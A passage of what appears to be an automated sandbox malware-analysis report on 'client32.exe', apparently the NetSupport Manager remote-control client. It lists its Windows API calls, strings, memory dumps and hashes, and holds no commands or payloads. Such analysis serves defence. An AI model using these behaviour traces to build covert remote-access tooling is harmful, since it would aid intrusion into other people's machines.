                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
                                                                                                                                                                                                    • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                                                                                                                                                    • API String ID: 1946598539-1930157642
                                                                                                                                                                                                    • Opcode ID: 00eebd789066c9a2b16be221310bca7b8375f5ba327e1451c21d8dfcc0be106b
                                                                                                                                                                                                    • Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00eebd789066c9a2b16be221310bca7b8375f5ba327e1451c21d8dfcc0be106b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104F394
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1104F3C8
                                                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,24DE4E77), ref: 1104F40B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
                                                                                                                                                                                                    • GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1104F4FA
                                                                                                                                                                                                    • GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1104F5C8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 1104F5E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
                                                                                                                                                                                                    • String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
                                                                                                                                                                                                    • API String ID: 1070019554-2085025582
                                                                                                                                                                                                    • Opcode ID: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
                                                                                                                                                                                                    • Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1109D180
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D195
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D19B
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109D1A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                                                                                                    • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                                                                                                    • API String ID: 1194186020-3727536503
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_memsetwsprintf
• String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
• API String ID: 3453958691-770455996
APIs
• BeginPaint.USER32(?,?), ref: 1101549F
• GetWindowRect.USER32(?,?), ref: 110154B7
• _memset.LIBCMT ref: 110154C5
• CreateFontIndirectA.GDI32(?), ref: 110154E1
• SelectObject.GDI32(00000000,00000000), ref: 110154F5
• SetBkMode.GDI32(00000000,00000001), ref: 11015500
• BeginPath.GDI32(00000000), ref: 1101550D
• TextOutA.GDI32(00000000,00000000,00000000), ref: 11015530
• EndPath.GDI32(00000000), ref: 11015537
• PathToRegion.GDI32(00000000), ref: 1101553E
• CreateSolidBrush.GDI32(?), ref: 11015550
• CreateSolidBrush.GDI32(?), ref: 11015566
• CreatePen.GDI32(00000000,00000002,?), ref: 11015580
• SelectObject.GDI32(00000000,00000000), ref: 1101558E
• SelectObject.GDI32(00000000,?), ref: 1101559E
• GetRgnBox.GDI32(00000000,?), ref: 110155AB
• OffsetRgn.GDI32(00000000,?,00000000), ref: 110155CA
• FillRgn.GDI32(00000000,00000000,?), ref: 110155D9
• FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110155EC
• DeleteObject.GDI32(00000000), ref: 110155F9
• SelectObject.GDI32(00000000,?), ref: 11015603
• SelectObject.GDI32(00000000,?), ref: 1101560D
• DeleteObject.GDI32(?), ref: 11015616
• DeleteObject.GDI32(?), ref: 1101561F
• DeleteObject.GDI32(?), ref: 11015628
• SelectObject.GDI32(00000000,?), ref: 11015632
• DeleteObject.GDI32(?), ref: 1101563B
• SetBkMode.GDI32(00000000,?), ref: 11015645
• EndPaint.USER32(?,?), ref: 11015659
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
• String ID:
• API String ID: 3702029449-0
APIs
  • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
  • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
  • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
  • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
  • Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
  • Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
  • Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
  • Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565
• GetCursorPos.USER32(?), ref: 11049334
• WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
• GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
• WaitForInputIdle.USER32(?,000003E8), ref: 11049488
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
• GetCursorPos.USER32(?), ref: 110494AD
• EnumWindows.USER32(110425D0,?), ref: 11049504
• GetWindowRect.USER32(?,?), ref: 11049520
• WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
• GetClassNameA.USER32(00000000,?,00000040), ref: 11049549
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
                                                                                                                                                                                                    • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                                                                                                                                                    • API String ID: 4093120923-2853765610
                                                                                                                                                                                                    • Opcode ID: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                                                                                                    • Instruction ID: 1967bb51930ead73ce48ca5e19d163332f2271a687d5ff16e8e37c73a50f3493
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82A1C575E01229AFDB11CFA0CCC5FAAB7B9EB4A704F1041F9E919A7280E7316944CF61
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
• GetStockObject.GDI32(0000000F), ref: 110ED2C2
• GetDC.USER32(00000000), ref: 110ED33A
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
• RealizePalette.GDI32(00000000), ref: 110ED351
• GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
• SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
• RealizePalette.GDI32(00000000), ref: 110ED383
• ReleaseDC.USER32(00000000,00000000), ref: 110ED38B
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
• String ID:
• API String ID: 1969595663-0
• Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
• Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
• Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
• Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61
APIs
• LoadLibraryA.KERNEL32(psapi.dll,24DE4E77,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D
  • Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 111347F3
  • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
  • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
  • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
  • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
  • Part of subcall function 111347D0: _memset.LIBCMT ref: 11134867
• FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
• LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
• GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
• SetLastError.KERNEL32(00000078), ref: 111034E3
• SetLastError.KERNEL32(00000078), ref: 111034F0
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
• GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
• CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF
  • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
  • Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
  • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
  • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
  • Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
  • Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
  • Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
  • Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
  • Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05
• CloseHandle.KERNEL32(00000000), ref: 111035F6
• FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
• FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait_memset
• String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
• API String ID: 555709589-617439319
• Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
• Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
• Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
• Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61
APIs
• _memset.LIBCMT(?,000000FF,00000024), ref: 687F694D
• _get_daylight.MSVCR100(?), ref: 687F6989
• _get_dstbias.MSVCR100(?), ref: 687F699B
• _get_timezone.MSVCR100(?), ref: 687F69AD
• _gmtime64_s.MSVCR100(?,?), ref: 687F69E1
• _errno.MSVCR100 ref: 687F6A07
• _gmtime64_s.MSVCR100(?,?), ref: 687F6A13
• _errno.MSVCR100 ref: 68809DE1
• _invalid_parameter_noinfo.MSVCR100 ref: 68809DEB
• _errno.MSVCR100 ref: 68809DF7
• _invalid_parameter_noinfo.MSVCR100 ref: 68809E01
• _gmtime64_s.MSVCR100(?,?), ref: 68809E3A
• __allrem.LIBCMT ref: 68809EA5
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EC1
• __allrem.LIBCMT ref: 68809ED8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EF6
• __allrem.LIBCMT ref: 68809F0D
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
• String ID:
• API String ID: 3568092448-0
• Opcode ID: 6490e0a55d3d3f254444212492ff7b0cac055b1ec5b8daf744decb3ffd3c3ea4
• Instruction ID: 594a1202e5a92d0c4d84a6a79bf06f869ab7e168bda8dcf0205ca8ca3ca39a83
• Opcode Fuzzy Hash: 6490e0a55d3d3f254444212492ff7b0cac055b1ec5b8daf744decb3ffd3c3ea4
• Instruction Fuzzy Hash: F68107B5A40705ABE7149F7ECD84B6B73E9AF41324F90853AE521D7780EB70DA028B60
APIs
• DName::DName.LIBCMT ref: 6880D3AA
• DName::DName.LIBCMT ref: 6880D3DF
• atol.MSVCR100(687EEAA8,687EEAA8,00000010,FFFF0000,00000000,00000000), ref: 6880D469
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: NameName::$atol
• String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
• API String ID: 2083219425-3945972591
• Opcode ID: 7efc806dc9baede45c3a48c49bccc09f373cf1a6363b1d1220ee70e7fbac49f2
• Instruction ID: b8796a5c6ba03ccfc504ff1202db4f086799278df0dbb58ea5f5da93b43b6850
• Opcode Fuzzy Hash: 7efc806dc9baede45c3a48c49bccc09f373cf1a6363b1d1220ee70e7fbac49f2
• Instruction Fuzzy Hash: F271D3769442189AEB10D7ACCD8CFED77B8AF46308FC04D5AF156A7080EF746A84CB65
APIs
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
• ShowCursor.USER32(00000000), ref: 110F53D8
• OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
• GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
• TranslateMessage.USER32(?), ref: 110F5443
• DispatchMessageA.USER32(?), ref: 110F544C
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
• CloseHandle.KERNEL32(?), ref: 110F5473
• GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
• TranslateMessage.USER32(?), ref: 110F549E
• DispatchMessageA.USER32(?), ref: 110F54A7
• GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
• ShowCursor.USER32(00000001), ref: 110F54C2
• SetCursor.USER32(?), ref: 110F54CF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
• String ID: NSLockExit
• API String ID: 2358329513-1578567420
• Opcode ID: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
• Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
• Opcode Fuzzy Hash: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
• Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91
APIs
  • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
  • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
  • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
